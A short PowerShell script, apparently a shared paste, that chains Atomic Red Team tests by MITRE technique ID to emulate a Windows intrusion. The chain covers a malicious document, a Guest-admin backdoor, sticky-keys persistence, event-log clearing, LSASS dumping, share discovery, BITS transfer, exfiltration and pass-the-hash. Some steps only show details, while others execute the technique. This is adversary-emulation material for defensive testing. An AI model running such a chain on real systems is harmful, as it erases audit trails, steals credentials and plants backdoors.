jessemoore

AtomicTest-AttackChain

Sep 26th, 2020 (edited)
```powershell
# Atomic Chain
# https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/Indexes/Matrices/windows-matrix.md
#
# Switches used below: -ShowDetails / -ShowDetailsBrief print the test without running it,
# -CheckPrereqs only checks prerequisites, -PromptForInputArgs prompts for input argument values.
#
# MalDoc
Invoke-AtomicTest T1204.002 -TestNumbers 3 -ShowDetailsBrief
#
# Enable Guest and add to Administrators group w/ RDP capability
Invoke-AtomicTest T1078.001 -ShowDetailsBrief
#
# Add cmd.exe to sethc sticky keys
Invoke-AtomicTest T1546.008 -PromptForInputArgs
#
# Evasion T1070.001 - Clear Windows Event Logs
Invoke-AtomicTest T1070.001 -TestNumbers 2
#
# Dump LSASS
Invoke-AtomicTest T1003.001 -TestNumbers 2 -CheckPrereqs
#
# Look for Network Shares
Invoke-AtomicTest T1135 -TestNumbers 3 -ShowDetails
#
# See what shares are available
Invoke-AtomicTest T1135 -TestNumbers 4
#
# Transfer file or execute C2
Invoke-AtomicTest T1197 -TestNumbers 2
#
# Exfil file
Invoke-AtomicTest T1020 -ShowDetailsBrief
#
# Pass the Hash with Mimikatz
Invoke-AtomicTest T1550.002 -TestNumbers 1 -PromptForInputArgs
```